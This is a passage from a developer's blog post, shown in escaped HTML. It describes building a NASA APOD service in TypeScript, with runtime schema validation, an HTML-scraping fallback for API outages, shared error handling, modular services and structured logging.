  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;timeoutId&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;setTimeout&lt;/span&gt;&lt;span class="p"&gt;(()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nx"&gt;controller&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;abort&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="nx"&gt;TIMEOUT_MS&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

  &lt;span class="k"&gt;try&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;fetch&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="na"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;controller&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;signal&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;headers&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;User-Agent&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;luisfaria.dev/1.0&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="p"&gt;});&lt;/span&gt;

    &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;ok&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="k"&gt;throw&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;ApodServiceError&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="s2"&gt;`NASA API error: &lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;status&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="nx"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;status&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="mi"&gt;429&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;RATE_LIMITED&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;NASA_API_ERROR&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="nx"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;status&lt;/span&gt;
      &lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;json&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;validated&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;apodResponseSchema&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;parse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="nx"&gt;logger&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;NASA API request successful&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="na"&gt;latencyMs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Date&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;now&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="nx"&gt;startTime&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;date&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;validated&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;date&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;userId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;context&lt;/span&gt;&lt;span class="p"&gt;?.&lt;/span&gt;&lt;span class="nx"&gt;userId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;});&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;validated&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;catch &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Error mapping logic...&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;finally&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nf"&gt;clearTimeout&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;timeoutId&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h3&gt;
  
  
  Phase 3: The Hard Part — Failures &amp;amp; Fallbacks (&lt;strong&gt;&lt;em&gt;aka scars earned&lt;/em&gt;&lt;/strong&gt;)
&lt;/h3&gt;

&lt;p&gt;This is where production engineering got real. Here's every bug I hit:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Problem&lt;/th&gt;
&lt;th&gt;Root Cause&lt;/th&gt;
&lt;th&gt;Solution&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Validation failures on &lt;code&gt;media_type: "other"&lt;/code&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Zod schema only accepted `'image' \&lt;/td&gt;
&lt;td&gt;'video'`&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;504 Gateway Timeout from NASA&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;NASA API occasionally unresponsive&lt;/td&gt;
&lt;td&gt;Implemented HTML scraping fallback&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;&lt;code&gt;url&lt;/code&gt; field missing for interactive content&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;NASA doesn't provide &lt;code&gt;url&lt;/code&gt; for SDO videos/embeds&lt;/td&gt;
&lt;td&gt;Added &lt;code&gt;apod_url&lt;/code&gt; (computed from date) as fallback&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Resolver error handling duplication&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Try/catch boilerplate in every resolver&lt;/td&gt;
&lt;td&gt;Extracted shared &lt;code&gt;createErrorHandler()&lt;/code&gt; utility&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Inconsistent error codes between services&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Each service used different error mapping&lt;/td&gt;
&lt;td&gt;Created &lt;code&gt;ErrorCodes&lt;/code&gt; constant as single source of truth&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Rate limit bypass by unauthenticated users&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Anonymous users shared the same Redis key&lt;/td&gt;
&lt;td&gt;Switched to session-based rate limiting for anonymous users&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Tests breaking after modular refactor&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Tests imported from old monolithic &lt;code&gt;apod.ts&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Rewrote mocks to match new module structure&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;NGINX 502 after deploying APOD feature&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Container DNS caching after recreation&lt;/td&gt;
&lt;td&gt;Added &lt;code&gt;nginx -s reload&lt;/code&gt; to CI/CD pipeline&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Bug #2 was the game-changer.&lt;/strong&gt; When NASA's API returned 504, users saw blank screens. Not acceptable. The fix: automatic HTML scraping fallback — if the API is down, scrape the website directly.&lt;/p&gt;




&lt;h3&gt;
  
  
  Phase 4: HTML Scraping Fallback (Issue #78)
&lt;/h3&gt;

&lt;p&gt;When the NASA API fails, the service automatically scrapes the official APOD website. Users never know the difference:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// src/services/apod/apod.fallback.ts&lt;/span&gt;
&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;fetchApodHtmlFallback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="nx"&gt;date&lt;/span&gt;&lt;span class="p"&gt;?:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;
&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="nb"&gt;Promise&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;ApodResponse&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;date&lt;/span&gt; 
    &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="s2"&gt;`https://apod.nasa.gov/apod/ap&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nf"&gt;formatDateForApodUrl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;date&lt;/span&gt;&lt;span class="p"&gt;)}&lt;/span&gt;&lt;span class="s2"&gt;.html`&lt;/span&gt;
    &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;https://apod.nasa.gov/apod/astropix.html&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;html&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;fetch&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;then&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;res&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;text&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;$&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;cheerio&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;load&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;html&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

  &lt;span class="c1"&gt;// Parse structured data&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;title&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;center:first b:first&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;text&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;trim&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;explanation&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;center:first p:last&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;text&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;trim&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;imageUrl&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;center:first img&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;attr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;src&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;date&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;date&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;Date&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;toISOString&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;T&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="nx"&gt;title&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;explanation&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;url&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;imageUrl&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;media_type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;image&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;apod_url&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="c1"&gt;// ... rest of fields&lt;/span&gt;
  &lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Orchestration in &lt;code&gt;apod.service.ts&lt;/code&gt;:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;fetchApod&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;options&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{}):&lt;/span&gt; &lt;span class="nb"&gt;Promise&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;ApodResponse&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;try&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;fetchApodFromApi&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;buildApiUrl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;options&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="nx"&gt;options&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;context&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;catch &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;shouldFallback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;logger&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;warn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;NASA API failed, falling back to HTML scraping&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;error&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
      &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;fetchApodHtmlFallback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;options&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;date&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;throw&lt;/span&gt; &lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Users never see errors — they just get the APOD, regardless of which method worked. That's the whole point.&lt;/p&gt;




&lt;h3&gt;
  
  
  Phase 5: Shared Error Handling Infrastructure (Issue #79)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Before refactor:&lt;/strong&gt; Each resolver had 30+ lines of try/catch boilerplate. Copy-paste engineering at its worst.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;After refactor:&lt;/strong&gt; &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Created &lt;code&gt;src/utils/errors/graphqlErrors.ts&lt;/code&gt; with reusable utilities&lt;/li&gt;
&lt;li&gt;Error factories for common cases: &lt;code&gt;Errors.unauthenticated()&lt;/code&gt;, &lt;code&gt;Errors.forbidden()&lt;/code&gt;, &lt;code&gt;Errors.notFound()&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Generic &lt;code&gt;createErrorHandler()&lt;/code&gt; wrapper generator&lt;/li&gt;
&lt;li&gt;Service-specific error mappers (e.g., &lt;code&gt;withApodErrorHandling&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Impact:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Resolvers went from 103 lines to 34 lines&lt;/li&gt;
&lt;li&gt;Single place to add new error codes&lt;/li&gt;
&lt;li&gt;Error mapping lives with service logic (where it belongs)&lt;/li&gt;
&lt;li&gt;Other features can reuse the same pattern — and they already do&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Key Engineering Lessons
&lt;/h2&gt;

&lt;p&gt;Five production-grade patterns I learned (the hard way) from building APOD:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Always Have a Fallback
&lt;/h3&gt;

&lt;p&gt;External APIs fail. Network timeouts happen. DNS breaks. If your feature depends on a third-party service, you need a backup plan — full stop:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Primary:&lt;/strong&gt; NASA JSON API (fast, structured)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fallback:&lt;/strong&gt; HTML scraping (slower, but always works)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;User experience:&lt;/strong&gt; Seamless — they never know which method was used&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  2. Validate External Data at Runtime
&lt;/h3&gt;

&lt;p&gt;TypeScript types don't protect you against API changes. NASA's schema evolved mid-development — they added &lt;code&gt;media_type: "other"&lt;/code&gt; for interactive content, which broke my Zod schema mid-sprint.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; Runtime validation with Zod catches schema drift before it crashes the server.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;validated&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;apodResponseSchema&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;parse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;  &lt;span class="c1"&gt;// Throws if schema mismatch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3. DRY Principle for Error Handling
&lt;/h3&gt;

&lt;p&gt;Don't duplicate try/catch blocks across resolvers. We've all done it. It's technical debt from day one. Extract shared error handling into reusable utilities:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Before: 30 lines of boilerplate per resolver&lt;/span&gt;
&lt;span class="c1"&gt;// After: 3 lines + shared error handler&lt;/span&gt;
&lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;withApodErrorHandling&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nf"&gt;fetchApod&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;date&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;args&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;date&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;context&lt;/span&gt; &lt;span class="p"&gt;}),&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;getApodByDate&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4. Modular Services Are Testable Services
&lt;/h3&gt;

&lt;p&gt;Splitting the monolithic &lt;code&gt;apod.ts&lt;/code&gt; into focused modules made testing trivial — and debugging even more so:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;src/services/apod/
├── apod.service.ts       # Orchestration (API + fallback)
├── apod.api.ts           # NASA API client
├── apod.fallback.ts      # HTML scraping
├── apod.errors.ts        # Typed errors
├── apod.types.ts         # Zod schemas
└── apod.constants.ts     # Config
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each module has a single responsibility. Tests mock at the module boundary, not the entire service.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Log Everything for Observability
&lt;/h3&gt;

&lt;p&gt;Every NASA API request logs:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Latency (&lt;code&gt;latencyMs&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;User context (&lt;code&gt;userId&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Success/failure status&lt;/li&gt;
&lt;li&gt;Error codes and details&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When bugs happen in production (and they will), structured logs are your debugging lifeline.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="nx"&gt;logger&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;NASA API request successful&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="na"&gt;latencyMs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;142&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
